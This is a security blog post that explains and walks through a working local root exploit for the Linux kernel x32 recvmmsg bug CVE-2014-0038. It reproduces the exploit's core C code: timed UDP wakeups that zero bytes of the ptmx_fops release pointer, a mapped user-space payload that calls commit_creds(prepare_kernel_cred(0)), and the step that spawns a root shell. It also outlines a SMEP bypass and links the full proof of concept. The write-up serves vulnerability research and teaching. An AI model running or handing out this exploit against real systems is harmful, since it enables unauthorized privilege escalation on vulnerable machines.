How to exploit the x32 recvmmsg() kernel vulnerability CVE-2014-0038
http://blog.includesecurity.com/2014/03/exploit-CVE-2014-0038-x32-recvmmsg-kernel-vulnerablity.html
The Vulnerable Linux Kernel Code
The bug is located in the x32 version of the recvmmsg syscall in the Linux kernel. The recvmmsg syscall allows for receiving multiple messages on a socket with just one syscall (and can thus increase performance in certain situations).
To be clear, the x32 ABI (not to be confused with the x86 ABI) is a separate ABI that is not enabled by default on all distributions. However, recent Ubuntu-based distributions as well as Arch Linux have enabled it. For more details on the x32 ABI refer to [2]. In short, x32 is an ABI that takes advantage of the 64-bit environment while using 32-bit pointers for less overhead. However, the x32 system calls can also be reached by standard 64-bit applications by adding the value of __X32_SYSCALL_BIT to the 64-bit system call number.
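As a rough illustration of that last point, the sketch below tags a syscall number with the x32 marker bit. The value 0x40000000 is what the x86 kernel headers define for __X32_SYSCALL_BIT; the helper names and any example number fed into them are made up for this sketch. ORing and adding are equivalent here because native syscall numbers never have that bit set.

```c
#include <assert.h>
#include <stdbool.h>

/* Same value as __X32_SYSCALL_BIT in the x86 kernel headers. */
#define X32_SYSCALL_BIT 0x40000000L

/* Hypothetical helper: mark a syscall number as an x32 call. */
static long to_x32_nr(long nr)
{
    /* A native number must not already carry the marker bit. */
    assert(nr >= 0 && nr < X32_SYSCALL_BIT);
    return nr | X32_SYSCALL_BIT;
}

/* Hypothetical helper: does this number select the x32 syscall table? */
static bool is_x32_nr(long nr)
{
    return (nr & X32_SYSCALL_BIT) != 0;
}
```

The kernel's syscall entry code looks at this bit to decide which table a call is dispatched through, which is why a plain 64-bit process can end up in the x32 handler.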
The CVE 2014-0038 bug is a fairly classic case of trusting user supplied input. The timeout pointer in the function below is passed directly from user space to __sys_recvmmsg, which expects a trusted pointer, without first copying the value of the user supplied pointer to a controlled kernel space variable.
The following is the code which handles the recvmmsg syscall for the x32 ABI (net/compat.c):
asmlinkage long compat_sys_recvmmsg(int fd, struct compat_mmsghdr __user *mmsg,
unsigned int vlen, unsigned int flags,
struct compat_timespec __user *timeout)
{
int datagrams;
struct timespec ktspec;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (COMPAT_USE_64BIT_TIME) /* set when doing the x32 syscall, the x32 ABI uses 64bit time values */
return __sys_recvmmsg(fd, (struct mmsghdr __user *)mmsg, vlen,
flags | MSG_CMSG_COMPAT,
(struct timespec *) timeout);
/* ... */
Pointers passed from user space are marked with the __user attribute to make sure they are only accessed through the user space API functions (e.g. copy_to_user, copy_from_user, ...). In this case though, the timeout parameter is cast directly to a type not containing the __user attribute, and then passed on to __sys_recvmmsg without any further checks on it.
Compare this to what the normal x86_64 syscall does:
SYSCALL_DEFINE5(recvmmsg, int, fd, struct mmsghdr __user *, mmsg,
unsigned int, vlen, unsigned int, flags,
struct timespec __user *, timeout)
{
int datagrams;
struct timespec timeout_sys;
if (flags & MSG_CMSG_COMPAT)
return -EINVAL;
if (!timeout)
return __sys_recvmmsg(fd, mmsg, vlen, flags, NULL);
/* -1- */
if (copy_from_user(&timeout_sys, timeout, sizeof(timeout_sys)))
return -EFAULT;
datagrams = __sys_recvmmsg(fd, mmsg, vlen, flags, &timeout_sys);
if (datagrams > 0 &&
copy_to_user(timeout, &timeout_sys, sizeof(timeout_sys)))
datagrams = -EFAULT;
return datagrams;
}
At -1- the timeout struct is copied into a kernel space variable before passing it to __sys_recvmmsg. That's the correct way to do it.
Digging Deeper Into the Vulnerability
First things first: the timespec structure, defined in include/uapi/linux/time.h:
struct timespec {
long tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
Now let's take a closer look at what happens to the timeout pointer passed from user space.
From compat_sys_recvmmsg the pointer is passed to __sys_recvmmsg, located in net/socket.c:
int __sys_recvmmsg(int fd, struct mmsghdr __user *mmsg, unsigned int vlen,
unsigned int flags, struct timespec *timeout)
{
if (timeout && /* -1- */
poll_select_set_timeout(&end_time, timeout->tv_sec,
timeout->tv_nsec))
return -EINVAL;
/* ... */
while (datagrams < vlen) { /* -2- */
/*
* Basically just a loop calling recvmsg
* until the timeout is hit or vlen messages have
* been received.
*/
if (MSG_CMSG_COMPAT & flags) {
err = ___sys_recvmsg(sock, (struct msghdr __user *)compat_entry,
&msg_sys, flags & ~MSG_WAITFORONE,
datagrams);
/* ... */
} else {
err = ___sys_recvmsg(sock,
(struct msghdr __user *)entry,
&msg_sys, flags & ~MSG_WAITFORONE,
datagrams);
/* ... */
}
/* ... */
if (timeout) {
ktime_get_ts(timeout); // put current time into *timeout
// then subtract that from end_time
*timeout = timespec_sub(end_time, *timeout); /* -3- */
if (timeout->tv_sec < 0) {
timeout->tv_sec = timeout->tv_nsec = 0; /* -4- */
break;
}
/* Timeout, return less than vlen datagrams */
if (timeout->tv_nsec == 0 && timeout->tv_sec == 0)
break;
}
/* ... */
The first thing to note here is the block at -1-. Here poll_select_set_timeout will set end_time to the time when the timeout will be over. More importantly, it will check whether timeout points to a valid timespec struct. If it does not then it will return -EINVAL and thus cause the syscall to fail.
Here is the function performing the check (include/linux/time.h):
static inline bool timespec_valid(const struct timespec *ts)
{
/* Dates before 1970 are bogus */
if (ts->tv_sec < 0) /* -5- */
return false;
/* Can't have more nanoseconds then a second */
if ((unsigned long)ts->tv_nsec >= NSEC_PER_SEC) /* -6- */ // include/linux/time.h: #define NSEC_PER_SEC 1000000000L
return false;
return true;
}
At -5- the first long, tv_sec, is checked to be non-negative, meaning its most significant byte must be smaller than 0x80, and at -6- the tv_nsec member is checked to be smaller than 1,000,000,000 ns (= 1 second), so tv_nsec must be at least 0 and less than 0x000000003b9aca00. Keep this in mind as we move on.
Next the code enters the loop at -2-, waiting for incoming packets. After a packet has been received by ___sys_recvmsg, the timeout struct is updated to contain the time left (-3-).
If that value is < 0, both tv_sec and tv_nsec are set to zero at -4- and the function returns.
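To get a feel for which byte patterns pass this check, here is a small user space model of it. It is only a sketch: the function name is invented, and it assumes a little-endian host with 64-bit longs, as on x86_64.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define NSEC_PER_SEC 1000000000ULL

/*
 * Interpret the 16 bytes at mem as a timespec (two little-endian
 * 64-bit longs) and apply the same two tests as timespec_valid().
 */
static bool bytes_form_valid_timespec(const unsigned char *mem)
{
    int64_t tv_sec, tv_nsec;

    assert(mem != NULL);
    memcpy(&tv_sec, mem, sizeof(tv_sec));
    memcpy(&tv_nsec, mem + 8, sizeof(tv_nsec));

    if (tv_sec < 0)                        /* corresponds to -5- */
        return false;
    if ((uint64_t)tv_nsec >= NSEC_PER_SEC) /* corresponds to -6- */
        return false;
    return true;
}
```

For instance, the eight bytes 41 42 43 44 ff ff ff ff read as tv_sec give a negative number and fail, while a single ff byte followed by fifteen zero bytes reads as tv_sec = 255, tv_nsec = 0 and passes.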
The loop will thus exit if either vlen messages have been received or the timeout is hit after receiving a packet. Do note the call will only return after a packet has been received, even if the timeout has already been hit. By sending packets to ourselves from a forked child, we can enter the code that updates the timeout at any time. And by setting vlen to 1, we can guarantee that timeout is only written to once.
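The update at -3- and -4- can be modelled in user space to see what ends up in the timeout struct. This is a sketch only: the struct and function names are invented, and the upper bound on tv_sec merely keeps the model's nanosecond arithmetic from overflowing.

```c
#include <assert.h>
#include <stdint.h>

#define NSEC_PER_SEC 1000000000LL

struct model_timespec {
    int64_t tv_sec;
    int64_t tv_nsec;
};

/*
 * Model of what is written to *timeout when a packet arrives
 * elapsed_ns nanoseconds after the syscall was entered with the
 * given initial timeout value.
 */
static struct model_timespec timeout_after_packet(struct model_timespec initial,
                                                  int64_t elapsed_ns)
{
    struct model_timespec left = {0, 0};
    int64_t total_ns;

    /* Model limit, not a kernel check: avoid int64 overflow below. */
    assert(initial.tv_sec >= 0 && initial.tv_sec < 4000000000LL);
    assert(initial.tv_nsec >= 0 && initial.tv_nsec < NSEC_PER_SEC);
    assert(elapsed_ns >= 0);

    total_ns = initial.tv_sec * NSEC_PER_SEC + initial.tv_nsec - elapsed_ns;
    if (total_ns < 0)
        return left;    /* deadline passed: both fields are zeroed (-4-) */

    left.tv_sec = total_ns / NSEC_PER_SEC;   /* remaining time (-3-) */
    left.tv_nsec = total_ns % NSEC_PER_SEC;
    return left;
}
```

With an initial value of {255, 0}, a packet after 254.5 seconds leaves {0, 500000000}, whereas a packet after 256 seconds leaves {0, 0}.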
The Exploitation Vector
So what can we do with this situation from an exploitation perspective?
The basic idea that comes to mind is pointing the timeout pointer to sensitive kernel data with known content and waiting a specific amount of time until sending a UDP packet (thus reaching the block at -3- in the code above). This will cause the function to update the timeout structure and return.
In other words we will make the kernel treat some of its own memory (preferably a function pointer) as the timeout argument and thus cause the kernel to overwrite part of its own memory. This allows us to write a nearly arbitrary value to an address of our choosing (we have 64bit pointers so we can address the whole address space), as long as the original value is known and there is a valid timespec struct at that address.
Since pointers into the kernel image on x86_64 (such as function pointers) have their high 4 bytes set to 0xff, they make a good target.
Imagine the following situation:
pointer: 0xffffffff44434241 uninitialized data
(little endian)
+-------------------------+-------------------------+-------------------------+
| 41 42 43 44 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
^ point timeout here
[-------- tv_sec -------] [------- tv_nsec -------]
If the address of the last (most significant) byte of the pointer is passed as a timeout, waiting >= 255 seconds will clear that byte without mangling up adjacent data as the whole block is set to zero. Repeating this for the next two bytes will allow us to point that pointer into user space (this is what the original version of the exploit did).
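To speed things up the bytes can be cleared in parallel. For this to work the time between the syscall and the incoming packet must be more than 254 s and less than 255 s: the remaining time that is written back then has the least significant byte of tv_sec reduced from 0xff to 0x00, while the higher bytes of tv_sec, which are still 0xff for the calls aimed at the lower bytes, are left untouched. The price is that recvmmsg also writes garbage to the following two longs, as they are treated as tv_nsec values and will then contain the remaining nanoseconds of the timeout.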
A Walk-through of the Proof-of-concept Exploit
Now let's start with a brief overview of the steps the exploit takes to get root privileges.
The exploit follows the common scheme of tricking the kernel into executing code in user space memory. This has quite a few advantages, including being able to write the payload in nicely readable C code. For a more detailed discussion of this technique refer to [3].
Here are the basic steps:
- Allocate executable and writable memory at the address to which the kernel will jump, and copy the kernel payload to the end of that region.
- Target the release function pointer of the ptmx_fops structure located in the .data section which is writable kernel memory. Zero out the three most significant bytes, thereby turning it into a pointer inside of the region mapped by user space.
- Open /dev/ptmx and close it, causing ptmx_fops->release() to be called.
- Check if root privileges were obtained and start a shell.
Let's examine each of those steps in more detail.
Resolving symbols
The exploit needs four kernel symbols to be resolved:
#define PTMX_FOPS 0xffffffff81fb30c0LL
#define TTY_RELEASE 0xffffffff8142fec0LL
#define COMMIT_CREDS 0xffffffff8108ad40LL
#define PREPARE_KERNEL_CRED 0xffffffff8108b010LL
They can be taken from /boot/System.map or the decompressed kernel image via nm.
The PoC linked at the end of this post also contains a script (build.sh) which helps with resolving the symbols. The README in the PoC provides details on how to use it.
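For readers who prefer to look the addresses up by hand, the following sketch parses one line of the "address type name" format that nm prints and System.map uses. It is not taken from the PoC or its build.sh; the function name and the 127-character name limit are choices made for this example.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/*
 * Parse one "address type name" line, e.g.
 *   ffffffff8108ad40 T commit_creds
 * Returns 1 and stores the address if the line describes the wanted
 * symbol, 0 otherwise (including lines that do not parse).
 */
static int match_symbol_line(const char *line, const char *wanted,
                             unsigned long long *addr)
{
    unsigned long long value;
    char type;
    char name[128];

    assert(line != NULL && wanted != NULL && addr != NULL);
    if (sscanf(line, "%llx %c %127s", &value, &type, name) != 3)
        return 0;
    if (strcmp(name, wanted) != 0)
        return 0;
    *addr = value;
    return 1;
}
```

Calling this for every line read with fgets() from the symbol file, once per wanted name, yields the four values for the defines above.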
Setting things up
/* Prepare payload... */
printf("preparing payload buffer...\n");
code = (long)mmap((void*)(TTY_RELEASE & 0x000000fffffff000LL), PAYLOADSIZE,
PROT_READ | PROT_WRITE | PROT_EXEC, /* = 7 */
MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, /* = 0x32 */ 0, 0);
memset((void*)code, 0x90, PAYLOADSIZE);
code += PAYLOADSIZE - 1024;
memcpy((void*)code, &kernel_payload, 1024);
The first thing the exploit does is allocate executable and writable memory at a fixed address. TTY_RELEASE is the original value of the targeted pointer in kernel space. Since the three most significant bytes of that pointer will be cleared, a mask of 0x000000fffffff000 has to be applied to it.
The memory region is then filled with nops and the kernel payload (discussed later) is copied into it.
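The address arithmetic behind the mask can be checked with a few lines of C. This is a sketch with invented helper names; the region size passed to lands_in_mapping stands in for PAYLOADSIZE, whose value is not shown in this post.

```c
#include <assert.h>
#include <stdint.h>

/* Keep the low five bytes of the pointer and round down to a 4 KiB page. */
#define MAP_MASK     0x000000fffffff000ULL
/* What is left of a pointer once its three top bytes are zero. */
#define CLEARED_MASK 0x000000ffffffffffULL

/* Address at which user space has to map its buffer. */
static uint64_t map_base_for(uint64_t kernel_ptr)
{
    return kernel_ptr & MAP_MASK;
}

/* Value of the pointer after the three most significant bytes are cleared. */
static uint64_t pointer_after_clearing(uint64_t kernel_ptr)
{
    return kernel_ptr & CLEARED_MASK;
}

/* True if the cleared pointer falls inside [base, base + size). */
static int lands_in_mapping(uint64_t kernel_ptr, uint64_t size)
{
    uint64_t base = map_base_for(kernel_ptr);
    uint64_t dest = pointer_after_clearing(kernel_ptr);

    assert(size > 0);
    return dest >= base && dest - base < size;
}
```

For the TTY_RELEASE value listed earlier (0xffffffff8142fec0), the mapping starts at 0xff8142f000 and the cleared pointer is 0xff8142fec0, that is 0xec0 bytes into the region. Execution therefore starts in the nop area and slides into the payload, provided the payload begins after that offset.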
The target
/*
* Now clear the three most significant bytes of the fops pointer
* to the release function.
* This will make it point into the memory region mapped above.
*/
printf("changing kernel pointer to point into controlled buffer...\n");
target = PTMX_FOPS + FOPS_RELEASE_OFFSET;
for (i = 0; i < 3; i++) {
pids[i] = fork();
if (pids[i] == 0) {
zero_out(target + (5 + i));
exit(EXIT_SUCCESS);
}
sleep(1);
}
The pointer targeted in the exploit is the release function pointer of the ptmx_fops structure, which originally points to tty_release. In the Linux kernel the file_operations structure contains a bunch of function pointers to be executed when user space accesses the associated file. Examples include open, release, write, ... ptmx_fops->release is called when the last reference to that file descriptor is released. The two pointers following release are not initialized (= 0) and will thus be valid tv_nsec values. The situation is then similar to the one depicted in the diagram shown in the "Exploitation Vector" section. User space can map 0x000000ffxxxxxxxx, meaning only 3 of the 4 high order bytes of the pointer need to be cleared. To speed things up three additional processes are forked, each one clearing a byte of the pointer. (Note: The sleep(1) between each fork is done here to guarantee a different seed for srand() in each child. This is needed so every child opens a different UDP port.)
Exploiting the bug
void zero_out(long addr)
{
int sockfd, retval, port, pid, i;
struct sockaddr_in sa;
char buf[BUFSIZE];
struct mmsghdr msgs;
struct iovec iovecs;
srand(time(NULL));
port = 1024 + (rand() % (0x10000 - 1024));
sockfd = socket(AF_INET, SOCK_DGRAM, 0);
if (sockfd == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
if (bind(sockfd, (struct sockaddr *) &sa, sizeof(sa)) == -1) {
perror("bind()");
exit(EXIT_FAILURE);
}
memset(&msgs, 0, sizeof(msgs));
iovecs.iov_base = buf;
iovecs.iov_len = BUFSIZE;
msgs.msg_hdr.msg_iov = &iovecs;
msgs.msg_hdr.msg_iovlen = 1;
/*
* Start a separate process that sends a UDP message after 254 seconds so the syscall returns,
* but not before updating the timeout struct and writing the remaining time into it.
* 0xff seconds minus slightly more than 254 seconds leaves tv_sec = 0x00
*/
printf("clearing byte at 0x%lx\n", addr);
pid = fork();
if (pid == 0) {
memset(buf, 0x41, BUFSIZE);
if ((sockfd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) {
perror("socket()");
exit(EXIT_FAILURE);
}
sa.sin_family = AF_INET;
sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
sa.sin_port = htons(port);
sleep(0xfe);
printf("waking up parent...\n");
sendto(sockfd, buf, BUFSIZE, 0, (struct sockaddr *) &sa, sizeof(sa)); /* -1- */
exit(EXIT_SUCCESS);
} else if (pid > 0) {
retval = syscall(__NR_recvmmsg, sockfd, &msgs, 1, 0, (void*)addr); /* -2- */
if (retval == -1) {
printf("address can't be written to, not a valid timespec struct!\n");
exit(EXIT_FAILURE);
}
waitpid(pid, 0, 0);
printf("byte zeroed out\n");
} else {
perror("fork()");
exit(EXIT_FAILURE);
}
}
This is the key part of the exploit: we're abusing the bug as discussed in the "Exploitation Vector" section. After a lot of code to set up the structures needed for the syscall, the passed address is used as the timeout pointer (-2-), so the byte it points at becomes the least significant byte of tv_sec, and the vulnerable syscall is called.
At -1- the forked child process will wake its parent so the time difference between the syscall and the incoming packet is between 254 and 255 seconds, thus setting the least significant byte of the tv_sec member to 0.
Keep in mind that this function is executed by three child processes. The memory at the address of ptmx_fops->release roughly looks like this at the beginning:
release pointer uninitialized uninitialized
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff ff ff ff | 00 00 00 00 00 00 00 00 | 00 00 00 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
^ address for child 3
^ address for child 2
^ address for child 1
Turning it into:
release pointer mangled mangled
+-------------------------+-------------------------+-------------------------+
| c0 fe 42 81 ff 00 00 00 | 00 00 00 00 00 xx xx xx | xx xx xx 00 00 00 00 00 |
+-------------------------+-------------------------+-------------------------+
ptmx_fops->release now points into the memory region that was mapped at the beginning.
Code execution in Ring 0
/* ... and trigger. */
printf("releasing file descriptor to call manipulated pointer in kernel mode...\n");
pwn = open("/dev/ptmx", O_RDWR); /* the PoC passes 'r' as flags here, which is not a valid open() flag constant */
close(pwn);
At this point we are ready to execute our payload in ring 0 by opening a file descriptor to /dev/ptmx and immediately closing it, causing the kernel to call ptmx_fops->release in the current context.
Now if all goes well (see restrictions further down) the kernel will jump to our code, change the creds structure of our process to a new one with root privileges (and all capabilities) and return to user mode.
Let's take a closer look at how that is done next.
Kernel payload
int __attribute__((regparm(3)))
kernel_payload(void* foo, void* bar)
{
_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;
_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;
/* restore function pointer and following two longs */
*((int*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 4)) = -1;
*((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 8)) = 0;
*((long*)(PTMX_FOPS + FOPS_RELEASE_OFFSET + 16)) = 0;
/* escalate to root */
commit_creds(prepare_kernel_cred(0));
return -1;
}
This is the function copied into the end of the allocated buffer at the beginning. The kernel will execute this code during the close syscall and then return back to user space. The kernel payload uses an old approach which has been documented by Brad Spengler (Spender) in his enlightenment framework [4] (see exploit.c).
Basically, after restoring the manipulated memory region, a new cred structure with full privileges is allocated by prepare_kernel_cred and afterwards passed to commit_creds to install it on the current task. Since the exploit needs to resolve the tty_release and ptmx_fops symbols anyway, this approach was chosen.
It would also be possible to change the credentials without calling any helper functions in the kernel.
This can be done by looking for a pointer to the cred structure stored in the task_struct for the current process, which can in turn be found at the beginning of the kernel stack.
By searching for memory that contains the current process uid and gid and setting those to zero, root privileges can be acquired as well.
For an example demonstrating this technique refer to the semtex.c exploit [5].
Finishing
if (getuid() != 0) {
printf("failed to get root :(\n");
exit(EXIT_FAILURE);
}
printf("got root, enjoy :)\n");
return execl("/bin/bash", "-sh", NULL);
Some notes on reliability
Since the exploit relies on timing it might be unreliable if the exploited system is under very heavy load.
If the kernel fails to reschedule the child process to wake up its parent on time (meaning within a second), the pointer will get corrupted and the exploit will fail, causing a kernel Oops.
In this case a non-threaded exploit which clears the bytes sequentially can be used. It waits 255 seconds for each byte, which guarantees that the whole timespec structure will be zeroed out when waking up the parent. This approach takes three times as long as the parallel version though, so approximately 13 minutes (3 x 255 s) [6]. I have tested the parallel version on a system under heavy load (100% CPU usage) multiple times and have not seen the exploit fail, so I assume this to be more of a theoretical issue (setting up the sockets and rescheduling a process within one second is really no big deal, even under stress).
In theory, the original non-threaded version of this exploit is therefore more reliable than the threaded one, but it does take a while to execute.
Exploit restrictions
Since the exploit tricks the kernel into executing user space pages, it can be stopped by SMEP [7]. SMEP will cause the CPU to generate a fault if it is executing code from a user space page in kernel mode. Think of SMEP as a kind of DEP/NX for the kernel. To bypass SMEP, bit 20 of CR4 (the SMEP enable bit) can be cleared through a ROP chain. Afterwards, executing code in user space is possible. This technique is described in further detail in [8]. If no gadgets can be found for writing to the CR4 register, exploitation would still be possible by writing the entire payload as a ROP chain.
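To make the bit position concrete, here is the mask arithmetic on a plain integer. The names are made up for this sketch, and the code only models a CR4 value; it does not read or write the register.

```c
#include <assert.h>
#include <stdint.h>

/* SMEP is controlled by bit 20 of CR4, counting from bit 0. */
#define CR4_SMEP_BIT  20
#define CR4_SMEP_MASK (1ULL << CR4_SMEP_BIT)

static_assert(CR4_SMEP_MASK == 0x100000ULL, "bit 20 corresponds to 0x100000");

/* True if the given CR4 value has SMEP switched on. */
static int smep_enabled(uint64_t cr4)
{
    return (cr4 & CR4_SMEP_MASK) != 0;
}

/* The same CR4 value with only the SMEP bit cleared. */
static uint64_t without_smep(uint64_t cr4)
{
    return cr4 & ~CR4_SMEP_MASK;
}
```

A value such as 0x1407f0 has the bit set, and clearing it gives 0x0407f0 with all other bits unchanged.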
Also see the post in [9].
That's it, find the full proof-of-concept exploit code at:
https://github.com/saelo/cve-2014-0038
If you have interesting optimizations or alternative implementations let us know via email info/at\includesecurity.com
References
[1] http://seclists.org/oss-sec/2014/q1/187
[2] http://en.wikipedia.org/wiki/x32_ABI
[3] http://www.phrack.org/issues.html?id=6&issue=64
[4] http://grsecurity.net/~spender/exploits/enlightenment.tgz
[5] http://packetstormsecurity.com/files/121616/semtex.c
[6] http://pastebin.com/DH3Lbg54
[7] http://en.wikipedia.org/wiki/Control_register#CR4
[8] http://blog.ptsecurity.com/2012/09/bypassing-intel-smep-on-windows-8-x64.html
[9] http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux